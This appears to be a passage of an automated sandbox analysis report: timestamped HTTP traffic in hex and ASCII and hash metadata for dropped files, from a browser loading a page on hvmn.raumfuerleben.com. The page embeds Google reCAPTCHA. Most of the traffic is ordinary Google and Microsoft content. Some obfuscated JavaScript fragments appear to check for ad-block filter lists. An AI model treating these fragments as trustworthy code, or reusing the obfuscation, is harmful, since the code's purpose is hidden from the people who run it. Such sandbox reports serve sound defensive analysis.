2024-08-28 11:31:47 UTC	1603	IN	Data Raw: 30 78 33 33 63 29 5d 2b 28 61 62 3f 61 63 3a 30 78 30 29 29 2c 61 64 5b 27 6c 65 6e 67 74 68 27 5d 29 29 3d 3d 3d 61 59 29 61 63 3d 61 4d 28 61 64 2c 61 63 2c 61 73 29 3b 65 6c 73 65 7b 69 66 28 4b 42 28 30 78 34 35 35 29 21 3d 3d 4b 42 28 30 78 34 66 30 29 29 7b 69 66 28 61 6d 28 61 67 2c 61 48 28 61 64 2c 61 59 2c 61 63 29 29 2c 61 67 5b 27 6c 65 6e 67 74 68 27 5d 3d 3d 3d 61 41 29 72 65 74 75 72 6e 20 61 67 3b 66 6f 72 28 76 61 72 20 5a 30 3d 30 78 31 3b 5a 30 3c 3d 61 58 5b 4b 42 28 30 78 64 30 29 5d 2d 30 78 31 3b 5a 30 2b 2b 29 69 66 28 61 6d 28 61 67 2c 61 58 5b 5a 30 5d 29 2c 61 67 5b 4b 42 28 30 78 64 30 29 5d 3d 3d 3d 61 41 29 72 65 74 75 72 6e 20 61 67 3b 61 63 3d 61 59 3d 61 47 3b 7d 65 6c 73 65 7b 69 66 28 57 55 28 5a 30 2c 74 68 69 73 29 29 Data Ascii: 0x33c)]+(ab?ac:0x0)),ad['length']))===aY)ac=aM(ad,ac,as);else{if(KB(0x455)!==KB(0x4f0)){if(am(ag,aH(ad,aY,ac)),ag['length']===aA)return ag;for(var Z0=0x1;Z0<=aX[KB(0xd0)]-0x1;Z0++)if(am(ag,aX[Z0]),ag[KB(0xd0)]===aA)return ag;ac=aY=aG;}else{if(WU(Z0,this))
2024-08-28 11:31:47 UTC	15936	IN	Data Raw: 33 65 33 38 0d 0a 76 61 72 20 5a 45 3d 5a 39 28 5a 33 2c 5a 4d 29 3b 5a 45 26 26 64 65 6c 65 74 65 20 5a 33 5b 5a 4d 5d 2c 5a 57 28 5a 44 2c 5a 4d 2c 5a 79 29 2c 5a 45 26 26 5a 44 21 3d 3d 5a 33 26 26 5a 57 28 5a 33 2c 5a 4d 2c 5a 45 29 3b 7d 2c 5a 4b 3d 61 54 26 26 61 4d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 78 37 21 3d 3d 61 65 28 5a 57 28 7b 7d 2c 27 61 27 2c 7b 27 67 65 74 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5a 57 28 74 68 69 73 2c 27 61 27 2c 7b 27 76 61 6c 75 65 27 3a 30 78 37 7d 29 5b 27 61 27 5d 3b 7d 7d 29 29 5b 27 61 27 5d 3b 7d 29 3f 5a 43 3a 5a 57 2c 5a 75 3d 66 75 6e 63 74 69 6f 6e 28 5a 44 2c 5a 4d 29 7b 76 61 72 20 4b 53 3d 4b 51 3b 69 66 28 27 46 4f 44 42 76 27 21 3d 3d 4b 53 28 30 78 34 38 35 Data Ascii: 3e38var ZE=Z9(Z3,ZM);ZE&&delete Z3[ZM],ZW(ZD,ZM,Zy),ZE&&ZD!==Z3&&ZW(Z3,ZM,ZE);},ZK=aT&&aM(function(){return 0x7!==ae(ZW({},'a',{'get':function(){return ZW(this,'a',{'value':0x7})['a'];}}))['a'];})?ZC:ZW,Zu=function(ZD,ZM){var KS=KQ;if('FODBv'!==KS(0x485
2024-08-28 11:31:47 UTC	16384	IN	Data Raw: 31 31 61 38 38 0d 0a 61 73 65 20 30 78 61 3a 61 79 5b 30 78 31 5d 3d 61 75 5b 61 6c 2b 30 78 39 5d 2c 57 6a 28 61 79 2c 30 78 38 29 2c 57 54 28 61 4d 2c 61 79 29 3b 63 61 73 65 20 30 78 39 3a 61 79 5b 30 78 31 5d 3d 61 75 5b 61 6c 2b 30 78 38 5d 2c 57 54 28 61 4d 2c 61 79 29 2c 57 76 28 61 4d 2c 57 71 29 2c 57 72 28 61 4d 2c 30 78 32 31 29 2c 57 76 28 61 4d 2c 57 45 29 2c 57 54 28 61 54 2c 61 4d 29 3b 63 61 73 65 20 30 78 38 3a 61 79 5b 30 78 31 5d 3d 61 75 5b 61 6c 2b 30 78 37 5d 2c 57 6a 28 61 79 2c 30 78 33 38 29 2c 57 54 28 61 44 2c 61 79 29 3b 63 61 73 65 20 30 78 37 3a 61 79 5b 30 78 31 5d 3d 61 75 5b 61 6c 2b 30 78 36 5d 2c 57 6a 28 61 79 2c 30 78 33 30 29 2c 57 54 28 61 44 2c 61 79 29 3b 63 61 73 65 20 30 78 36 3a 61 79 5b 30 78 31 5d 3d 61 75 5b Data Ascii: 11a88ase 0xa:ay[0x1]=au[al+0x9],Wj(ay,0x8),WT(aM,ay);case 0x9:ay[0x1]=au[al+0x8],WT(aM,ay),Wv(aM,Wq),Wr(aM,0x21),Wv(aM,WE),WT(aT,aM);case 0x8:ay[0x1]=au[al+0x7],Wj(ay,0x38),WT(aD,ay);case 0x7:ay[0x1]=au[al+0x6],Wj(ay,0x30),WT(aD,ay);case 0x6:ay[0x1]=au[
2024-08-28 11:31:47 UTC	16384	IN	Data Raw: 62 2c 61 75 3d 7b 27 61 62 70 49 6e 64 6f 27 3a 5b 6c 54 28 30 78 31 34 37 29 2c 6c 54 28 30 78 31 37 32 29 2c 6c 54 28 30 78 34 33 65 29 2c 6c 54 28 30 78 32 61 34 29 2c 61 54 28 6c 54 28 30 78 31 37 34 29 29 5d 2c 27 61 62 70 76 6e 27 3a 5b 6c 54 28 30 78 62 34 29 2c 6c 54 28 30 78 31 32 61 29 2c 61 54 28 27 27 29 2c 6c 54 28 30 78 31 35 64 29 2c 6c 54 28 30 78 63 35 29 5d 2c 27 61 64 42 6c 6f 63 6b 46 69 6e 6c 61 6e 64 27 3a 5b 6c 54 28 30 78 33 64 34 29 2c 61 54 28 27 27 29 2c 27 2e 79 6c 61 6d 61 69 6e 6f 73 27 2c 61 54 28 6c 54 28 30 78 32 37 63 29 29 2c 61 54 28 6c 54 28 30 78 34 62 31 29 29 5d 2c 27 61 64 42 6c 6f 63 6b 50 65 72 73 69 61 6e 27 3a 5b 6c 54 28 30 78 34 63 64 29 2c 6c 54 28 30 78 31 38 63 29 2c 6c 54 28 30 78 32 36 31 29 2c 6c 54 28 Data Ascii: b,au={'abpIndo':[lT(0x147),lT(0x172),lT(0x43e),lT(0x2a4),aT(lT(0x174))],'abpvn':[lT(0xb4),lT(0x12a),aT(''),lT(0x15d),lT(0xc5)],'adBlockFinland':[lT(0x3d4),aT(''),'.ylamainos',aT(lT(0x27c)),aT(lT(0x4b1))],'adBlockPersian':[lT(0x4cd),lT(0x18c),lT(0x261),lT(

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:46 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-28 11:31:46 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=252260 Date: Wed, 28 Aug 2024 11:31:46 GMT Content-Length: 55 Connection: close X-CID: 2
2024-08-28 11:31:46 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:48 UTC	633	OUT	GET /recaptcha/api.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://hvmn.raumfuerleben.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:48 UTC	749	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Expires: Wed, 28 Aug 2024 11:31:48 GMT Date: Wed, 28 Aug 2024 11:31:48 GMT Cache-Control: private, max-age=300 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d" Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]} Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:48 UTC	641	IN	Data Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.g
2024-08-28 11:31:48 UTC	800	IN	Data Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
2024-08-28 11:31:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	550538
Entropy (8bit):	5.675557514253788
Encrypted:	false
SSDEEP:	6144:P0+gkOqQJ3Y4CW9vgZN6che5AGLNJxXG5DIFAvw0Wimqf9gkhnZIbfhn7/bBRyTE:cbWScytNHQgAvVfKczC
MD5:	70306D36CE9DBCBD8E5D1C9913A5210F
SHA1:	04949AD636F8CD09BF91059BC4AAF1973C92A15F
SHA-256:	1425B3DC4E809E5488AAE10E2EB2511F652C6A9C3845C98C3FE69F07FE0C9E2B
SHA-512:	A7F00BA83FEE80E7F2006C9E1F0121E2E515F4956182924E67C95A8C5522F30735F7BF4A6F7DCF3CBD29A685E967B1C4DDFD72D7F1F4CEFBE55326BECDACB275
Malicious:	false
Reputation:	low
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var w=function(){return[function(n,T,M,A,E,x,a,U){return((n\|1)&((n\|(n+8>>(((U=["C",17,"F"],n+6)^8)>=n&&(n+3^8)<n&&(M[U[0]]&&M[U[0]][U[2]]&&(E=M[U[0]][U[2]],x=M.u,x in E&&delete E[x],l[45](50,T,M[U[0]][U[2]],A,M)),M.u=A),4)\|\|(a=HT(M[U[2]],function(W){return typeof W[T]==="function"})),32))==n&&(a=M.u\|\|(M.u=T+(M.VR.G5++).toString(36))),16))<5&&(n^5)>=U[1]&&(a=M!=null&&M.sg===T),a},function(n,T,M,A,E,x,a,U){return(n&(((n\|24)==(U=["getValue",43,null],n)&&X.call(this,T),n&52)==n&&(E=H[49](31,M),E!=U[2]&&.E!=U[2]&&(B[19](73,T,0,A),l[3](6,128,T.L,E))),(n<<2&15)>=4&&n+3<22&&T.keyCode==13&&this.L[U[0]]().length==6&&(this.A

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17795)
Category:	dropped
Size (bytes):	18390
Entropy (8bit):	5.641345797735626
Encrypted:	false
SSDEEP:	384:BQtJSnXhi6a0AyViv+187xUA4Hf/liSH1u0MSfaBucN9pSizIvuWIEcaG80vxII5:BQt4nX06a0xk889UNHf/4SHETSopSaIO
MD5:	D884695788C51F19E3E2409A500C81EE
SHA1:	D2FDE907CC279E328BD68E9AEC27948F77EC945D
SHA-256:	3D22A8A5A92C738BF44DE13D312B9F50177AB8BB132CDDFFD492881126F82588
SHA-512:	BFB70A180E6C07DE64EE68D500F280D30400CAEEF455DA7E97F7B9F357BC69670A46A53A9C69AE8FEC48C8086667804B986F3C8C10FB56C684BAA83E0F65FBBB
Malicious:	false
Reputation:	low
Preview:	/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t / (function(){var l=function(U,V){if((V=(U=null,a).trustedTypes,!V)\|\|!V.createPolicy)return U;try{U=V.createPolicy("bg",{createHTML:f,createScript:f,createScriptURL:f})}catch(v){a.console&&a.console.error(v.message)}return U},f=function(U){return U},a=this\|\|self;(0,eval)(function(U,V){return(V=l())&&U.eval(V.createScript("1"))===1?function(v){return V.createScript(v)}:function(v){return""+v}}(a)(Array(Math.random()7824\|0).join("\n")+['(function(){/',.'',.' SPDX-License-Identifier: Apache-2.0',.'/',.'var VX=function(U,v){if((v=(U=null,B).trustedTypes,!v)\|\|!v.createPolicy)return U;try{U=v.createPolicy("bg",{createHTML:Uc,createScript:Uc,createScriptURL:Uc})}catch(V){B.console&&B.console.error(V.message)}return U},vG=function(U,v,V){return v.A$(function(f){V=f},false,U),V},aK=function(U,v){return U[v]<<24\|U[(v\|0)+1]<<16\|U[(v\|0)+2]<<8\|U[(v\|0)+3]},sc=function(U,v,V,f,l){((V=(f=(V=(l=v&4,v&=3,n)(U),n(U

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:49 UTC	451	OUT	GET /recaptcha/api.js HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:49 UTC	749	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Expires: Wed, 28 Aug 2024 11:31:49 GMT Date: Wed, 28 Aug 2024 11:31:49 GMT Cache-Control: private, max-age=300 Cross-Origin-Resource-Policy: cross-origin Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:49 UTC	641	IN	Data Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.g
2024-08-28 11:31:49 UTC	800	IN	Data Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
2024-08-28 11:31:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:50 UTC	962	OUT	GET /recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://hvmn.raumfuerleben.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:50 UTC	891	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 28 Aug 2024 11:31:50 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-X4OZ3zaNi75L2-DZvXwYMA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:50 UTC	499	IN	Data Raw: 35 37 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b Data Ascii: 575f<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face {
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 35 6d 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 Data Ascii: FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2'); unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 34 6d 78 4b 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b Data Ascii: EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2) format('woff2');
